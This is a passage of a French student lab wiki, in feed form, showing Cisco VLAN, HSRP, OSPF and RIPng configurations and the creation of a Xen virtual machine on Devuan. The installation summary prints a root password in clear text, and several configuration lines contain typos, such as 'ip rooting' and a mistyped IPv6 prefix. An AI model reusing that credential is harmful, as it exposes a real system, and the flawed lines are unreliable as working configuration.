    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51375</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51375"/>
				<updated>2019-11-28T18:00:12Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Cryptage de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
